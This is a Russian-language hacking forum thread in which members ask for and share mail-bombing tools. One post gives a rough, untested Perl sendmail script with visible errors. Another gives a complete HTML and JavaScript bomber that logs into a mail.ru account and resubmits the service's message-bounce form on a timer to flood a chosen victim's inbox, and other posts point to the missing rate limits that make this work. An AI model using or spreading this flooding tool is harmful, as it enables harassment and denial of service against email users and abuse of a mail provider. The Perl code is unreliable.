Мыл-Бомбинг

Discussion in 'Уязвимости Mail-сервисов' started by limbonic, 10 Mar 2004.

  1. limbonic

    limbonic New Member

    Joined:
    5 Dec 2003
    Messages:
    52
    Likes Received:
    0
    Reputations:
    0
    Народ ..приветы всем..я понимаю ..что мыл бомбинг и мыл бомберы  уже старо как мир..но все  же..посоветуйте хороший мыл бомбер..а то чет ни одного толкового нет...не получается бомбить (испытывал на своем ящике)...всетаки ..пусть будет такая штука на всякий случай.:)
     
  2. Guest

    Guest Guest

    Reputations:
    0
    Советую использовать в качве шаблона html-флудер для чата, а в action указать запрос на переадресовку сообщения со своего ящика на неприятельский. 3-5 писем в секунду обеспечено, причем трафик практически не нагружается, и не зависит от размера файла, так что файлом в 200кб можно под завязку забить ящик где-то за минуту
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Вот в чем дело: html-овский флудер для чата тут не подойдет, т.к. на многих бесплатных хостингах стоит таймаут. Там надо отсылать n-ное кол-во сообщений и заново перезагружать программу (это самый простой вариант - я уже не говорю о создании нескольких потоков с использованием прокси-сервера). Почту можно отправлять и с помощью PHP3? ASP (Active Server Pages) ... Можно написать прогу, которая сама соединится с Smtp серваком и сделает запрос на отправку письма ...
    Лучше всего эту программу написать на перле, которая будет работать не с твоего компа, а с сервака. Тогда и скорость будет приличная и траффик не жрет.
    Я не очень силен в перле, но код должен быть такой примерно:
    #!/usr/local/bin/perl
    $mailprog= '/usr/sbin/sendmail';
    $mail = 'proba@mail.ru';
    $from = 'antichat@mail.ru';
    open (mail, "|$mailprog -t");
    print Mail "Countet-Type: text/plain; charset=windows-1251\n;
    print Mail &quot;Subjest: 'Привет Дарку [​IMG]'\n&quot;; <span style='color:red'>#Вот не помню как тема пишется - в апострофах или нет...</span>
    print mail &quot;to: $mail/n&quot;;
    print Mail &quot;from: $form\n\n&quot;;
    print mail &quot;Текст письма\n&quot;;
    print mail &quot;\n\n&quot;;
    close (mail);
    print &quot;content-type: text/html\n\n&quot;;
    print &quot;Письмо для дарка отправлено!&quot;;
    И когда ты запустишь прогу из своей бродилки, то появится сообщение, что письмо дарку отправлено,  оно будет лежать в твоем ящике. Я это не компилировал, так что за работу не ручаюсь ...
    С уважением, Че Гевара
     
  4. Guest

    Guest Guest

    Reputations:
    0
    Осталось только найти бесплатный хостинг с поддержкой cgi и исходящим коннектом)
    Так что думаю html-флудер использовать проще, тем более на mail.ru например в скрипте http://win.mail.ru/cgi-bin/bouncemsg не стоит ограничения по времени, более того, в поле &quot;To&quot;, то есть кому, нет ограничений по кол-ву адресатов, по крайней мере я при тестировании бомбил сразу 6 ящиков
     
  5. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    А как ты размер задавал тогда?
     
  6. stooper

    stooper New Member

    Joined:
    19 Mar 2004
    Messages:
    1
    Likes Received:
    3
    Reputations:
    10
    идея за хтмл флудер реальна и проста. подойдет, если по приколу самому забацать за 0.1 сек [​IMG]
    А Че Гевара тут скрипты рисует какие то мутные: уже начал писать, так забацал бы весь скрипт уже (и цыкл, с бесконечной отправкой...) а то, не а, не то [​IMG]... кому оно нада, в таком вот виде? над бы хтмл форму намалевать, саму работу в 2х словах описать, что вообще реально, как запустить из формы(с какими параметрами), как будет сформировано обращение к скрипту? (хз, можт ты собрался с помощью джавы делать флудинг из формы...)
    а сырец реально до жопы, если чел не вьедет в работу цги,
    а сэндмыло все порубит и так: на хостингах все будет происходить оч долго, и юзвер добавит тебя в игнор.
    (гы, привет дафи дарк! [​IMG] )
    мне кажется, что все можно сделать проще, с помощью скрипта cgi-mail: я заглянул только что в код, и выкупил, что он реально дыже сындмыло не юзает, вау! [​IMG] вот и находка, епть. еще позволяет цеплять нехилые аттачи, внушительных размеров. это то, что нада: валишь как хошь: числом и размером, и таймауты пофигу. вот он - рулеззз.
     
  7. Guest

    Guest Guest

    Reputations:
    0
    &lt; script&gt;
    function bombing(){
    document.forms[1].submit();
    time1=setTimeout('bombing()',document.forms[2].interval.value);
    }

    &lt;/script&gt;


    &lt;form name=&quot;Auth&quot; method=post action=http://win.mail.ru/cgi-bin/auth target=&quot;right&quot;&gt;
    &lt;input type=hidden name=SessionID value=ID_СЕССИИ_МОЖНО_НЕ_МЕНЯТЬ&gt;
    &lt;input type=hidden name=Mpopl value=217715896&gt;
    &lt;input type=hidden name=login_from value=titul&gt;

    &lt;input type=hidden name=&quot;Login&quot; value=&quot;ЛОГИН_НА_МЭЙЛ_РУ&quot;&gt;
    &lt;input type=hidden name=&quot;Domain&quot; value=&quot;ДОМЕН&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;Password&quot; value=&quot;ПАРОЛЬ&quot;&gt;&lt;/td&gt;
    &lt;input TYPE=submit name=&quot;&quot; value=&quot; &nbsp; &nbsp; &nbsp;Войти &nbsp; &nbsp; &nbsp;&quot;&gt;
    &lt;/form&gt;

    &lt;form method=&quot;post&quot; target=&quot;right&quot; action=&quot;http://win.mail.ru/cgi-bin/bouncemsg&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;ID_ПИСЬМА_КОТОРЫМ_БОМБИТЬ&quot;&gt;
    &lt;input name=&quot;To&quot;&gt;
    &lt;input type=&quot;button&quot; name=&quot;Submit&quot; value=&quot;ХУЙЯРИТЬ!&quot; onClick=&quot;bombing()&quot;&gt;
    &lt;input type=&quot;button&quot; value=&quot;АЦТАВИТЬ!&quot; onClick=&quot;clearTimeout(time1)&quot;&gt;
    &lt;/form&gt;

    &lt;form&gt;
    &lt;input name=interval value=500 size=4&gt;
    &lt;/form&gt;

    Вот html-код главного фрейма моего бомбера. Регистрируешь мыло на мэйле, отсылаешь туда файл требуемой длины, прописываешь в бомбере ID письма, логин, пароль, и весь процесс автоматизируется: нажимаешь &quot;войти&quot;, вводишь адрес мыла которое надо бомбить, и бомбишь) Порадовало, повторяюсь, то, что трафик не жрет
     
  8. Ugol

    Ugol Banned

    Joined:
    26 Dec 2009
    Messages:
    195
    Likes Received:
    2
    Reputations:
    0
    бомбилку не кто подскажет
     
  9. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    есть хороший бомбер от JAW )гуглите , должны найти
     
  10. emillord

    emillord Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    257
    Likes Received:
    443
    Reputations:
    255
    археологи ппц) тема 2004 года это наверно рекорд...
     
  11. Ugol

    Ugol Banned

    Joined:
    26 Dec 2009
    Messages:
    195
    Likes Received:
    2
    Reputations:
    0
    Привет.Не знаю какие бомбилы не качал не запускаются